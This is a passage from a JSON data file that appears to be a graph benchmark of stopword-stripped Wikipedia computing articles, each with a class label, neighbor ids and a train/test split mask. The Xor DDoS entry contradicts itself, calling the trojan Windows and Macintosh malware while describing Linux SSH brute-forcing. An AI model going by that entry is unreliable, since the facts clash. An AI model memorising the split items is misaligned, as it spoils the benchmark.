    "text": "Aravind_Joshi:aravind joshi aravind krishna joshi august 5 1929 – december 31 2017 henry salvatori professor computer cognitive science computer science department university pennsylvania joshi defined tree-adjoining grammar formalism often used computational linguistics natural language processing joshi studied pune university indian institute science awarded electrical engineering diisc communication engineering respectively joshi graduate work done electrical engineering department university pennsylvania awarded phd 1960 became professor penn co-founder co-director institute research cognitive science april 21 2005 joshi awarded franklin institute benjamin franklin medal computer cognitive science franklin institute citation states awarded medal fundamental contributions understanding language represented mind developing techniques enable computers process efficiently wide range human languages advances led new methods computer translation",
    "neighbors": [
      1890,
      7780,
      7724,
      3059,
      1783
    ],
    "mask": "Test"
  },
  {
    "node_id": 9523,
    "label": 4,
    "text": "Comodo_Mobile_Security:comodo mobile security comodo mobile security cms mobile application provided free comodo group protects android devices viruses worms scripts also features sms call blocking software process manager data apps backup data traffic monitor anti-theft feature allows users recover lost stolen devices first security app comodo specialists internet security android platform comodo mobile security requires android 2.2 cms 1.2 cms 2.4 br cms 2.4 released january 2014 major enhancements cms 2.4 include cms 2.5 cms 2.5 released june 2014 new features enhancements cms 2.7 cms 2.7 released december 2014 changes comodo mobile security 2.7 june 17 2013 av-test labs released test results 30 android mobile security products conducted may 2013 using android 4.2.2 comodo mobile security 2.0 scored 5.5 6 protection perfect 6 usability av-test two testing categories january 2015 av-test labs released test results 30 android mobile security products conducted january 2015 using android 5.0.1 comodo mobile security 2.7 scored 5.5 6 protection perfect 6 usability av-test two testing categories softonic.com reviewed comodo mobile security 1.1 january 2012 gave 9 10 stars rating excellent rosemary hattersley pc advisor gave comodo mobile security 1.2 3 ½ 5 stars wrote “ smartphone app good all-rounder offering initial health check plus ‘ anti-theft ’ tools guise remote lock wipe device location plus alert someone changes sim phone free",
    "neighbors": [
      2049,
      7809,
      131,
      1417,
      4374,
      1052,
      156,
      1949,
      2721,
      2213,
      550,
      1318,
      6823,
      2601,
      8614,
      2859,
      3243,
      6699,
      8615,
      6834,
      4403,
      10166,
      1083,
      704,
      9537,
      7362,
      10308,
      4421,
      202,
      1355,
      5069,
      10574,
      10708,
      2005,
      11225,
      1242,
      2907,
      8668,
      2654,
      9055,
      9569,
      3941,
      11622,
      4464,
      9713,
      115,
      3955,
      6643,
      9341,
      127
    ],
    "mask": "None"
  },
  {
    "node_id": 9524,
    "label": 4,
    "text": "Rogue_DHCP:rogue dhcp rogue dhcp server dhcp server network administrative control network staff network device modem router connected network user may either unaware consequences actions may knowingly using network attacks man middle kind computer viruses malicious software found set rogue dhcp especially classified category clients connect network rogue legal dhcp server offer ip addresses well default gateway dns servers wins servers among others information provided rogue dhcp differs real one clients accepting ip addresses may experience network access problems including speed issues well inability reach hosts incorrect ip network gateway addition rogue dhcp set provide default gateway ip address machine controlled misbehaving user sniff traffic sent clients networks violating network security policies well user privacy see man middle vmware virtual machine software also act rogue dhcp server inadvertently run client machine joined network vmware act rogue dhcp server handing random ip addresses clients around network end result large portions network cut internet rest domain without access rogue dhcp servers stopped means intrusion detection systems appropriate signatures well multilayer switches configured drop packets one common methods deal rogue dhcp servers called dhcp snooping dhcp snooping drops dhcp messages dhcp server trusted rogue dhcp servers detected using software manual examination perusing scapy package python",
    "neighbors": [
      1121,
      71,
      2996,
      4119,
      6456,
      5245,
      4863
    ],
    "mask": "Test"
  },
  {
    "node_id": 9525,
    "label": 2,
    "text": "Virtual_DOS_machine:virtual dos machine virtual dos machines vdm refer technology allows running 16-bit/32-bit dos 16-bit windows programs already another operating system running controlling hardware virtual dos machines operate either exclusively typical software emulation methods e.g dynamic recompilation rely virtual 8086 mode intel 80386 processor allows real mode 8086 software run controlled environment catching operations involve accessing protected hardware forwarding normal operating system exceptions operating system perform emulation resume execution dos software vdms generally also implement support running 16- 32-bit protected mode software dos extenders conform dos protected mode interface dpmi dos program running inside vdm needs access peripheral windows either allow directly rarely present dos program virtual device driver vdd emulates hardware using operating system functions vdm systematically emulations intel 8259a interrupt controllers 8254 timer chips 8237 dma controller etc january 1985 digital research together intel previewed concurrent dos 286 1.0 version concurrent dos capable running real mode dos programs 80286 protected mode method devised b-1 stepping processor chips however may 1985 stopped working c-1 subsequent processor steppings shortly digital research release product although e-1 stepping intel started address issues august 1985 digital research 8086 emulation mode worked utilizing undocumented loadall processor instruction slow practical microcode changes e-2 stepping improved speed early implementation seen predecessor actual virtual dos machines eventually concurrent dos 286 reworked potential desktop operating system become flexos 286 industrial use 1986 also licenced ibm 4680 os 1986 intel 80386 virtual 8086 mode became available samples since october 1985 quantities since june 1986 digital research switched use run real mode dos programs virtual dos machines protected mode concurrent dos 386 1.0 february 1987 flexos 386 1.0 june 1987 however architecture multiuser multitasking protected mode operating systems dos-based concurrent dos 386 later developed become multiuser dos since 1991 real/32 since 1995 flexos 386 later became 4690 os 1993 contrast protected mode operating systems dos default real-mode operating system switching protected mode virtual 86 mode behalf memory managers dos extenders order provide access extended memory map memory first megabyte accessible normal dos programs dos-based vdms appeared microsoft windows/386 2.01 september 1987 dos-based virtual dos machines also present windows 3.0 3.1x windows workgroups 3.1x running 386 enhanced mode well windows 95 98 98 se one characteristics solutions running top dos memory layout shown inside virtual dos machines virtual instances dos system dos driver configuration run multitasker loaded requests handled protected mode passed system domain executed underlying dos system similar windows 3.x 386 enhanced mode architecture emm386 3.xx novell dos 7 caldera opendos 7.01 dr-dos 7.02 later also uses dos-based vdms support pre-emptive multitasking multiple dos applications emm386 /multi option used component development digital research novell since 1991 codename vladivar originally separate device driver krnl386.sys instead module emm386 primarily developed next major version dr dos released novell dos 7 1994 also used never released dr dos panther star trek project 1992/1993 vdms called mvdm multiple virtual dos machine used os/2 2.0 later since 1992 os/2 mvdms considerably powerful ntvdm example block devices supported various dos versions booted os/2 mvdm os/2 1.x dos box based dos 3.0 os/2 2.x mvdms emulate dos 5.0 seamless integration windows 3.1 later win32s applications os/2 concept looking similar surface seamless integration xp mode based windows virtual pc windows 7 redirector guest vdm ntvdm allows access disks os/2 nt host applications guest use named pipes communication host ntvdm system component ia-32 editions windows nt family since 1993 allows execution 16-bit windows 16-bit 32-bit dos applications included 64-bit versions windows nt 32-bit user-mode executable forms basis single dos windows 3.x environment called ntvdm.exe order execute dos programs ntvdm loads ntio.sys turn loads ntdos.sys executes modified command.com order run application passed ntvdm command-line argument 16-bit real-mode system files stripped derivations ms-dos 5.0 equivalents io.sys msdos.sys command.com hard-wired assumptions fat file system removed using invalid opcode 0xc4 0xc4 bop 32-bit ntvdm handle requests originally ntdos reported dos version 30.00 programs soon changed report version 5.00 int 21h/ah=30h 5.50 int 21h/ax=3306h allow programs run unmodified holds true even newest releases windows many additional ms-dos functions commands introduced ms-dos versions 6.x windows 9x missing 16-bit applications run thread within single preemptively multithreaded 32-bit ntvdm process 16-bit processes default cooperatively multitasked respect unless run separate memory space option checked run box application shortcut file ntvdm emulates bios calls tables well windows 3.1 kernel 16-bit api stubs 32-bit wow translation layer thunks 16-bit api routines 32-bit dos emulation present dos protected mode interface dpmi 32-bit memory access layer converts necessary extended expanded memory calls dos functions windows nt memory calls wowexec.exe emulation layer emulates 16-bit windows windows 2000 windows xp added sound blaster 2.0 emulation 16-bit virtual device drivers dos block device drivers e.g. ram disks supported inter-process communication subsystems take place ole dde named pipes since virtual 8086 mode available non-x86-based processors specifically mips dec alpha powerpc ntvdm instead implemented full emulator versions nt using code licensed insignia softpc windows nt 3.51 80286 emulation available windows nt 4.0 486 emulation added following list commands part windows xp ms-dos subsystem january 2010 google security researcher tavis ormandy revealed serious security flaw windows nt vdm implementation allowed unprivileged users escalate privileges system level noted applicable security x86 versions windows nt kernel since 1993 included 32-bit versions windows nt 2000 xp server 2003 vista server 2008 windows 7 ormandy publish proof-of-concept exploit vulnerability prior microsoft release security patch workaround issue turn 16-bit application support prevented older programs written dos windows 3.1 running 64-bit versions windows affected since include ntvdm subsystem microsoft security patches applied affected operating systems vdm could safely reenabled limitation exists windows xp 16-bit subsystem earlier versions windows nt raised per-session limit gdi objects causes gdi handles shifted right two bits converting 32 16 bits result actual handle larger 14 bits consequently 16-bit applications happen served handle larger 16384 gdi system crash terminate error message x86-64 cpu virtual 8086 mode available sub-mode legacy mode running 16- 32-bit operating systems native 64-bit long mode ntvdm supported x86-64 windows including dos programs ntvdm uses vm86 ᴄᴘᴜ mode instead local descriptor table order enable 16‑bits segment required addressing aaarch64 microsoft ’ release full emulator incompatible instruction set like previous incompatible architecture way run use windows xp mode virtualization software use ntvdmx64 unofficial port older emulated implementation ntvdm provided nt 4 non-x86 platforms uses otvdm running 16 bits windows programs non virtualized way general vdm similar technologies satisfactorily run older dos games today computers emulation provided basic peripherals often implemented incompletely example sound emulation ntvdm limited nt-family versions windows update real screen times per second dos program writes emulate higher resolution graphics modes software mostly runs native speed host cpu timing loops expire prematurely either makes game run much fast causes software even notice emulated hardware peripherals wait long enough answer",
    "neighbors": [
      6148,
      7173,
      6150,
      11270,
      3082,
      5643,
      8715,
      4112,
      4624,
      537,
      540,
      3102,
      9762,
      8227,
      8740,
      1577,
      10281,
      8241,
      2101,
      7733,
      10812,
      3648,
      5697,
      7234,
      3142,
      5702,
      10310,
      1098,
      6730,
      7754,
      4173,
      4174,
      10828,
      9808,
      4178,
      9813,
      10839,
      603,
      9819,
      1632,
      3170,
      10338,
      5220,
      5225,
      622,
      9839,
      4210,
      7796,
      1656,
      6265,
      7290,
      4731,
      9340,
      3197,
      10879,
      641,
      8841,
      6797,
      4238,
      2193,
      9874,
      10900,
      2709,
      4248,
      2201,
      7838,
      9377,
      3235,
      2212,
      4771,
      6820,
      1703,
      2221,
      178,
      3250,
      5300,
      7349,
      7351,
      700,
      2236,
      2749,
      10428,
      2244,
      8391,
      200,
      9420,
      2782,
      1247,
      5856,
      9442,
      4836,
      4326,
      2279,
      1770,
      3308,
      5356,
      6893,
      10993,
      8439,
      11513,
      3834,
      3323,
      1791,
      255,
      8959,
      5378,
      11519,
      5380,
      6921,
      3856,
      8976,
      8977,
      5397,
      3351,
      8473,
      8985,
      11546,
      8988,
      11550,
      5413,
      6438,
      295,
      5928,
      3881,
      4394,
      10024,
      10026,
      10029,
      10537,
      7983,
      2355,
      1844,
      11572,
      823,
      10039,
      6972,
      318,
      3394,
      6984,
      2380,
      5457,
      3922,
      7507,
      4439,
      4441,
      5465,
      2910,
      11103,
      2402,
      2919,
      4458,
      6506,
      9066,
      8561,
      9593,
      2942,
      2943,
      3970,
      1418,
      5003,
      5004,
      8080,
      3473,
      11677,
      929,
      11683,
      3496,
      430,
      6062,
      10673,
      9655,
      6584,
      5049,
      954,
      1978,
      960,
      452,
      8132,
      6088,
      969,
      9166,
      3535,
      8659,
      5080,
      1498,
      5594,
      478,
      6114,
      6115,
      1513,
      6637,
      9709,
      6641,
      499,
      3573,
      8700
    ],
    "mask": "Test"
  },
  {
    "node_id": 9526,
    "label": 3,
    "text": "Manchester_United_(video_game_series):manchester united video game series manchester united football video game series licensed manchester united highly popular early 1990s game series programmed krisalis ordered release date game series programmed codemasters ordered release date",
    "neighbors": [],
    "mask": "Validation"
  },
  {
    "node_id": 9527,
    "label": 1,
    "text": "Data_source_name:data source name computing data source name dsn sometimes known database source name though data sources comprise repositories apart databases string associated data structure used describe connection data source commonly used connection odbc dsns also exist jdbc data access mechanisms term often overlaps connection string systems make distinction dsns connection strings term often used interchangeably dsn attributes may include limited system administrator client machine generally creates separate dsn relevant data source standardizing dsns offers level indirection various applications example apache/php iis/asp take advantage accessing shared data sources two kinds dsn exist broken software e.g. crystal reports microsoft excel php perl python ruby users submit crud create read update delete queries data source establishing connection dsn asp vbscript code open dsn connection might look like following dim databaseobject1 set databaseobject1 server.createobject adodb.connection databaseobject1.open dsn=example php using pear :db package open connection without external dsn dsn-less connection i.e. using connection string code might resemble following require_once db.php // dsn driver // username password host port database dsn mysql //john pass localhost:3306/my_db db db :connect dsn php pdo dsn mysql host=localhost dbname=example dbh new pdo dsn username password perl using perl dbi module driver syntax dsn attributes requirement dbi makes information except username password supplied single string argument dsn dbi pg database=finance host=db.example.com port= port dbh dbi- connect dsn 'username 'password",
    "neighbors": [
      2432,
      2688,
      8582,
      9481,
      10505,
      6417,
      10518,
      4376,
      9112,
      7968,
      290,
      1314,
      11683,
      7461,
      8742,
      5550,
      9263,
      5808,
      10418,
      3768,
      3004,
      9663,
      4416,
      5441,
      11457,
      8644,
      8518,
      72,
      853,
      2901,
      4439,
      9942,
      9177,
      987,
      860,
      9183,
      865,
      11362,
      10471,
      8808,
      9079,
      2681,
      9467
    ],
    "mask": "Test"
  },
  {
    "node_id": 9528,
    "label": 4,
    "text": "Partitioning_cryptanalysis:partitioning cryptanalysis cryptography partitioning cryptanalysis form cryptanalysis block ciphers developed carlo harpes 1995 attack generalization linear cryptanalysis harpes originally replaced bit sums affine transformations linear cryptanalysis general balanced boolean functions demonstrated toy cipher exhibits resistance ordinary linear cryptanalysis susceptible sort partitioning cryptanalysis full generality partitioning cryptanalysis works dividing sets possible plaintexts ciphertexts efficiently-computable partitions distribution ciphertexts significantly non-uniform plaintexts chosen uniformly given block partition partitioning cryptanalysis shown effective linear cryptanalysis variants des crypton specific partitioning attack called mod n cryptanalysis uses congruence classes modulo integer partitions",
    "neighbors": [
      7556,
      2567,
      3084,
      2957,
      7056,
      658,
      660,
      1173,
      1941,
      4128,
      4389,
      10662,
      169,
      11185,
      8627,
      8628,
      2357,
      10806,
      1847,
      2110,
      9541,
      10315,
      6863,
      8273,
      7635,
      212,
      9556,
      10963,
      11349,
      2265,
      7643,
      9697,
      8674,
      229,
      618,
      1898,
      881,
      1654,
      7161,
      7034,
      892
    ],
    "mask": "Test"
  },
  {
    "node_id": 9529,
    "label": 2,
    "text": "Podcast_Capture:podcast capture podcast capture introduced mac os x 10.5 leopard allows users record distribute podcasts software requires connection computer running mac os x server podcast producer users record input local remote audio video device capture screen activity choose existing file upload distribute",
    "neighbors": [
      11521,
      2819,
      1796,
      3719,
      4615,
      10888,
      11402,
      9100,
      5647,
      10512,
      1042,
      8852,
      9109,
      7318,
      4888,
      3228,
      11037,
      2207,
      1439,
      811,
      3371,
      5292,
      1710,
      6700,
      7983,
      8877,
      1074,
      10036,
      3766,
      2232,
      9912,
      11257,
      9406,
      6849,
      4933,
      713,
      9418,
      9035,
      3790,
      7118,
      5713,
      3670,
      9430,
      4184,
      3035,
      4571,
      2141,
      4702,
      4068,
      2149,
      5093,
      487,
      231,
      4457,
      9451,
      10221,
      8303,
      2288,
      6771,
      2676,
      7928,
      8441,
      7163,
      7422
    ],
    "mask": "None"
  },
  {
    "node_id": 9530,
    "label": 4,
    "text": "Yosemite_Server_Backup:yosemite server backup yosemite server backup cross-platform backup software developed barracuda networks inc. acquiring yosemite technologies barracuda networks released yosemite server backup first offering barracuda ware line products yosemite server backup software gained popularity among backup administrators used many big giants world ysb runs native 32- 64-bit systems back hard disks tapes microsoft windows support includes microsoft exchange microsoft sql server active directory yosemite server backup longer stand alone package sept. 30 2017 part barracuda backup",
    "neighbors": [
      929,
      3366,
      6797,
      1358,
      5491,
      11030
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9531,
    "label": 4,
    "text": "Piggyback_attack:piggyback attack piggyback attack active form wiretapping fact attacker gains access system via intervals inactivity another user ’ legitimate connection also called “ line attack ” piggyback-entry wiretapping security piggybacking actually someone tags along another person authorized gain entry restricted area pass something apply concept computer networks workstations",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 9532,
    "label": 4,
    "text": "MARID:marid marid ietf working group applications area tasked propose standards email authentication 2004 name acronym authorization records d. lightweight mta authentication protocol lmap generic name set 'designated sender proposals discussed asrg fall 2003 including schemes attempt list valid ip addresses send mail domain lightweight lmap essentially stands crypto opposed domainkeys successor dkim march 2004 internet engineering task force ietf held bof proposals result meeting task force chartered marid working group microsoft caller-id proposal late highly controversial addition mix came following features working group decided postpone question rfc 2821 smtp identities i.e mail covered spf helo covered csv spf favour rfc 2822 identities covered caller-id later sender-id purported responsible address pra wg arrived point sender policies could split different scopes like 2821 mail 2822 pra marid spf2.0 syntax also allowed join different scopes one policy record sets permitted ips identical often case less week publication first mfrom mail draft wg terminated unilaterally leadership marid existed seven months rfcs published responsible ietf area director agreed sponsor publication unfinished marid discussions ietf experiments happened 2005 pre-marid spf sender id approved experimental rfcs latter certain degree result marid growing caller-id proposal ongoing disputes technical issues incompatibilities sender id resulted later appeals iesg iab",
    "neighbors": [
      2848,
      2887,
      8202,
      8332,
      4272,
      8337,
      10578,
      6517,
      9909,
      479
    ],
    "mask": "None"
  },
  {
    "node_id": 9533,
    "label": 3,
    "text": "Write_(system_call):write system call write one basic routines provided unix-like operating system kernel writes data buffer declared user given device maybe file primary way output data program directly using system call destination identified numeric code data written instance piece text defined pointer size given number bytes codice_1 thus takes three arguments write call interface standardized posix specification data written file calling write function function prototype syntax codice_2 codice_3 signed data type defined codice_4 note codice_5 return unsigned value returns -1 error occurs must return signed value. br write function returns number bytes successfully written array may times less specified nbytes returns -1 exceptional condition encountered see section errors listed errors could encountered writing file errors macros listed errno.h write system call ordinary function spite close resemblance example linux x86 architecture system call uses instruction int 80h order transfer control kernel write system call counterpart read low level functions capable understanding bytes write used write records like classes thus higher level input-output functions like printf required often high-level interface preferred compared cluttered low-level interface functions call functions internally turn make calls write giving rise layered assembly functions use assembly higher level functions collect bytes data write required data file",
    "neighbors": [
      2432,
      3330,
      5514,
      5397,
      8988,
      6813,
      10016,
      9762,
      5158,
      1193,
      52,
      1844,
      823,
      3522,
      7501,
      593,
      5969,
      6358,
      5975,
      1509,
      6126,
      7663,
      9840,
      499,
      3571,
      7540,
      246,
      8438
    ],
    "mask": "Test"
  },
  {
    "node_id": 9534,
    "label": 8,
    "text": "PeopleBrowsr:peoplebrowsr peoplebrowsr technology company provides enterprise government top level domain owners ability launch blockchain integrated social networks analyze engage members networks owner new tlds peoplebrowsr creator .ceo .best sold best sas july 2018 .kred peoplebrowsr works enterprise government tld owners multiple industries december 2008 launched deep search dashboard managing engaging social stream peoplebrowsr receiving analyzing indexing full twitter firehose since 2008 combination sources peoplebrowsr compiled trillion conversation datamine enables conduct analytics using kred influence measurement company combined trillion conversation datamine kred influencer analytics socialos network platform three tlds become leading social network provider organizations around world october 2011 company debuted kred measuring influence outreach social networks peoplebrowsr engaged research projects including development artificial intelligence new social networking platforms peoplebrowsr ceo jodee rich believes documenting history real time social networking platforms creating wealth data used help computers better understand human behavior way machines trained mine human data learn behavior rather taught think like humans june 2013 peoplebrowsr launched socialos set apis bridges existing networks enables new social networks rapidly rolled-out peoplebrowsr owns top level domains .ceo .kred formerly .best domains released late 2013 early 2014 powered company products socialos kred trillion conversation datamine june 2018 peoplebrowsr received approval icann internet corporation assigned names numbers sell besttld pty ltd subsidiary best sas paris based company led president cyril fremont strategic deal would leverage peoplebrowsr socialos technology besttld pty ltd owns .best top level domain distribution agreements godaddy 50 domain registrars november 2012 peoplebrowsr sued twitter proposed shutdown peoplebrowser access twitter firehose set occur november 30 2012 peoplebrowsr injunction prevent disconnection twitter firehose twitter attempted move case federal court may invalidated injunction march 2013 peoplebrowsr battle keep case within california court system thereby keeping injunction place twitter peoplebrowsr reached out-of-court settlement april 2013",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 9535,
    "label": 9,
    "text": "Luca_Cardelli:luca cardelli luca andrea cardelli frs italian computer scientist assistant director microsoft research cambridge uk cardelli well known research type theory operational semantics among contributions helped design modula-3 implemented first compiler non-pure functional programming language ml defined concept typeful programming helped develop polyphonic c experimental programming language born montecatini terme italy attended university pisa receiving phd university edinburgh 1982 joining microsoft research 1997 worked bell labs digital equipment corporation contributed unix software including vismon 2004 inducted fellow association computing machinery fellow royal society 2007 cardelli awarded senior aito ole-johan dahl kristen nygaard prize",
    "neighbors": [
      10145,
      6306,
      1572,
      8262,
      5585,
      9298,
      5492,
      4341,
      4916,
      1783,
      11574,
      5947,
      11679
    ],
    "mask": "Test"
  },
  {
    "node_id": 9536,
    "label": 4,
    "text": "Xor_DDoS:xor ddos xor ddos trojan malware hijacks windows macintosh systems uses launch ddos attacks reached loads 150+ gbps.this trojan created steal data intercepting system network traffic searching banking usernames passwords credit card data paypal information social security numbers sensitive user data..it malicious computer program removed antiviruses like malware bytes microsoft security essentials norton mcafee webroot kaspersky sophos avast etc .it enables cyber-criminals spy steal sensitive data gain backdoor access system actions include deleting data blocking data modifying data copying data disrupting performance computers computer networks removed help windows security windows activated security blocks virus installing order gain access launches brute force attack order discover password secure shell services linux secure shell credentials acquired login successful uses root privileges run script downloads installs xor ddos believed asian origin based targets tend located asia several things noteworthy xor ddos built exclusively arm x86 systems appears programmed c/c++",
    "neighbors": [
      9282,
      3395,
      901,
      2409,
      2508,
      10477,
      10875,
      4883,
      7515,
      3581,
      9791
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9537,
    "label": 4,
    "text": "F-Secure:f-secure f-secure corporation formerly data fellows finnish cyber security privacy company based helsinki finland company 20 country offices presence 100 countries security lab operations helsinki finland kuala lumpur malaysia company develops sells antivirus password management endpoint security cyber security products services radar managed services vulnerability scanning rapid detection service flagship products company continues expand corporate market f-secure first established name data fellows petri allas risto siilasmaa 1988 data fellows trained computer users built customized databases three years later company launched first major software project developed first heuristic scanner antivirus products f-secure ’ first antivirus product windows pcs launched 1994 data fellows became f-secure 1999 f-secure first company developed anti-rootkit technology called blacklight 2005 june 2015 f-secure expanded enterprise market acquiring nsense danish company specializes security consultation vulnerability assessment purchase inverse path privately owned security italian consultancy experience avionics automative industrial control sectors february 2017 continues expansion cyber security services f-secure client security received av-test best protection award fifth time 2016 june 2018 f-secure acquired security company mwr infosecurity co-operation aalto university school science technology f-secure runs one semester course future virus analysts material available on-line media coverage magic lantern claims av vendors purposely leave backdoor products f-secure announced policy detecting spying programs f-secure corporation would like make known leave backdoors f-secure anti-virus products regardless source tools draw line every sample get regarding whether detect decision-making influenced technical factors nothing else within applicable laws regulations case meaning eu laws also adding detection program see might used terrorist activity benefit organized crime would like state record received queries regarding whether would guts detect something obviously made known violent mafia terrorist organization yes would",
    "neighbors": [
      2049,
      9732,
      1052,
      9246,
      5665,
      550,
      2601,
      6699,
      9791,
      10308,
      4165,
      7251,
      2654,
      2154,
      10872,
      4732,
      9341,
      127,
      7809,
      131,
      150,
      156,
      2721,
      2213,
      6823,
      3243,
      6834,
      704,
      7362,
      202,
      10448,
      11476,
      1242,
      1245,
      9443,
      6382,
      9460,
      3843,
      5891,
      7948,
      9488,
      4374,
      3867,
      6431,
      5924,
      1318,
      2859,
      8493,
      4403,
      9523,
      2879,
      3395,
      4421,
      1355,
      10574,
      5971,
      8024,
      2907,
      4957,
      9055,
      9569,
      3941,
      11622,
      4464,
      3955,
      6520,
      2425,
      1417,
      3981,
      10637,
      6550,
      9630,
      11166,
      1440,
      8614,
      8615,
      4013,
      10166,
      7103,
      1994,
      5069,
      10708,
      2005,
      11225,
      8668,
      9713,
      6643,
      507,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 9538,
    "label": 8,
    "text": "C10k_problem:c10k problem c10k problem problem optimising network sockets handle large number clients time name c10k numeronym concurrently handling ten thousand connections note concurrent connections requests per second though similar handling many requests per second requires high throughput processing quickly high number concurrent connections requires efficient scheduling connections words handling many requests per second concerned speed handling requests whereas system capable handling high number concurrent connections necessarily fast system one request deterministically return response within necessarily fixed finite amount time problem socket server optimisation studied number factors must considered allow web server support many clients involve combination operating system constraints web server software limitations according scope services made available capabilities operating system well hardware considerations multi-processing capabilities multi-threading model single threading model preferred concurrently aspect involves considerations regarding memory management usually operating system related strategies implied relate diverse aspects i/o management term coined 1999 dan kegel citing simtel ftp host cdrom.com serving 10,000 clients 1 gigabit per second ethernet year term since used general issue large number clients similar numeronyms larger number connections recently c10m 2010s early 2010s millions connections single commodity 1u server became possible 2 million connections whatsapp 24 cores using erlang freebsd 10–12 million connections migratorydata 12 cores using java linux common applications high number connections include pub/sub servers chat file servers web servers software-defined networking",
    "neighbors": [
      865,
      3237,
      4485,
      9224,
      5815,
      2060,
      4589,
      8691,
      823
    ],
    "mask": "None"
  },
  {
    "node_id": 9539,
    "label": 2,
    "text": "Segoe:segoe segoe typeface family fonts best known use microsoft company uses segoe online printed marketing materials including recent logos number products additionally segoe ui font sub-family used numerous microsoft applications may installed applications microsoft office 2007 windows live messenger 2009 adopted microsoft default operating system font beginning windows vista also used outlook.com microsoft web-based email service august 2012 microsoft unveiled new corporate logo typeset segoe replacing logo used previous 25 years segoe name registered trademark microsoft corporation although typeface originally developed monotype segoe designed steve matteson employment agfa monotype licensed microsoft use branding typeface user interface font designed friendly legible matteson created range weights italics humanist feel 2004 microsoft registered certain segoe segoe italic fonts original font designs european union trademark design office german font foundry linotype protested citing segoe ui similarity licensed frutiger family typefaces submission eu microsoft claimed linotype failed prove selling frutiger frutiger next prior 2004 eu rejected claims february 2006 eu revoked microsoft registration microsoft appeal decision microsoft still holds united states design patents various segoe based fonts period late 2004 six years agfa corporation monotype assets acquired ta associates company incorporated monotype imaging later august 2006 monotype imaging acquired linotype end 2006 linotype company challenged validity microsoft segoe patents wholly owned subsidiary monotype company originally licensed segoe microsoft several letters distinctly different forms segoe ui frutiger reflecting segoe ui different intended use low-resolution screen display rather airport signage frutiger however ulrich stiehl asserts many differences introduced later versions segoe ui – earlier versions segoe ui closer frutiger june 7 2005 scala electronic signage company unrelated typeface ff scala announced segoe removed infochannel product due licensing issues scala replaced segoe bitstream vera fonts november 2005 simon daniels program manager microsoft typography group stated original segoe fonts created microsoft existing monotype design licensed extensively extended customized meet requirements different processes apps devices april 2006 microsoft public relations spokesman asked named stated segoe original design developed agfa monotype monotype imaging 2000 2003 acquired original segoe fonts used develop extended family fonts retaining segoe name many new fonts received design patent protection united states segoe derived frutiger microsoft also current up-to-date license allows us distribute certain frutiger fonts connection microsoft products including office windows distinct differences segoe frutiger additionally unlike clone typefaces segoe family fonts metrically compatible frutiger used replacements united states copyright law abstract letter shapes functional text fonts copyrighted computer programming code font given copyright protection makes production distribution clone fonts possible early version segoe possibly evaluation version included certain versions suse linux longer ships part operating system segoe ui member segoe family used microsoft products user interface text well online user assistance material intended improve consistency users see text across languages distinguishable predecessor tahoma os x user interface font lucida grande rounder letters segoe ui produced monotype imaging light semibold versions segoe ui introduced windows 7 windows 8 8.1 10 segoe ui undergone number changes stylistic additions windows 8.1 segoe ui gained black black italic weights latin greek cyrillic scripts segoe ui optimized vista default cleartype rendering environment significantly less legible cleartype disabled except key user interface sizes 8 9 10 point segoe ui hinted bi-level rendering standard font size increased 9 point windows vista accommodate better layout readability languages windows vista version segoe ui version 5.00 contains complete unicode 4.1 coverage latin greek cyrillic arabic romans totaling 2843 glyphs regular weight segoe ui true cursive italic unlike oblique used frutiger helvetica members segoe family include one time microsoft also posted package called print ad microsoft dynamics business management solutions brief description microsoft downloads center package included truetype postscript type 1 beta versions segoe branding fonts along powerpoint templates marketing material windows phones also include customised version called segoe wp n designed clarity narrow enhance take cleartype microsoft released selawik metric-compatible segoe ui replacement symbols segoe ui symbols segoe mdl2 assets fallback sil ofl 2015 fonts used winjs winstrap selawik also one microsoft recommended fonts universal windows platform apps latin glyphs segoe segoe ui also found following microsoft font families malgun gothic korean microsoft jhenghei traditional chinese microsoft yahei simplified chinese gisha hebrew leelawadee thai windows 7 also found ebrima n'ko tifinagh vai khmer ui khmer lao ui lao microsoft new tai lue tai lue microsoft phagspa phags-pa microsoft tai le tai le fonts glyph shapes diverge significantly segoe ui frutiger/myriad model ways calligraphic gisha leelawadee capital narrower raised apex lowercase l tails capital serifs characteristics also seen segoe ui italic",
    "neighbors": [
      7171,
      6797,
      11283,
      4505,
      4127,
      2593,
      4130,
      7973,
      3881,
      4138,
      4141,
      4146,
      4148,
      8374,
      9654,
      1098,
      1487,
      3791,
      3538,
      5857,
      8422,
      9448,
      1515,
      364
    ],
    "mask": "Test"
  },
  {
    "node_id": 9540,
    "label": 2,
    "text": "Runlevel:runlevel runlevel mode operation computer operating systems implement unix system v-style initialization conventionally seven runlevels exist numbered zero six sometimes used synonym one levels one runlevel executed startup run levels executed one another i.e runlevel 2 3 4 executed sequentially order runlevel defines state machine boot different runlevels typically assigned necessarily particular order single-user mode multi-user mode without network services started multi-user mode network services started system shutdown system reboot system states exact setup configurations varies operating systems linux distributions example runlevel 4 might multi-user gui no-server configuration one distribution nothing another runlevels commonly follow general patterns described article however distributions employ certain specific configurations standard practice computer enters runlevel zero halts enters runlevel six reboots intermediate runlevels 1–5 differ terms drives mounted network services started default runlevels typically 3 4 5 lower runlevels useful maintenance emergency repairs since usually n't offer network services particular details runlevel configuration differ widely among operating systems also among system administrators various linux distributions traditional script used version 7 unix first replaced runlevels systemd states major distributions although systemd used default major linux distributions runlevels still used means provided sysvinit project linux kernel booted program reads file determine behavior runlevel unless user specifies another value kernel boot parameter system attempt enter start default runlevel systems conforming linux standard base lsb need provide exact run levels given give meanings described may map level described different level provides equivalent functionality slackware linux uses runlevel 1 maintenance linux distributions runlevels 2 3 5 identically configured console services active runlevel 4 adds x window system starting solaris 10 smf service management facility used instead svr4 run levels latter emulated preserve compatibility legacy startup scripts aix follow system v r4 svr4 runlevel specification runlevels 0 9 available well c h 0 1 reserved 2 default normal multi-user mode runlevels 3 9 free defined administrator runlevels c h allow execution processes runlevel without killing processes started another runlevels true runlevels used tell init command enter maintenance mode system enters maintenance mode another runlevel system console used terminal",
    "neighbors": [
      7804,
      5985,
      9665,
      516,
      4581,
      9444,
      5000,
      4011,
      823,
      10318,
      7983,
      1399,
      1304,
      4218,
      2811,
      700,
      2399
    ],
    "mask": "Test"
  },
  {
    "node_id": 9541,
    "label": 3,
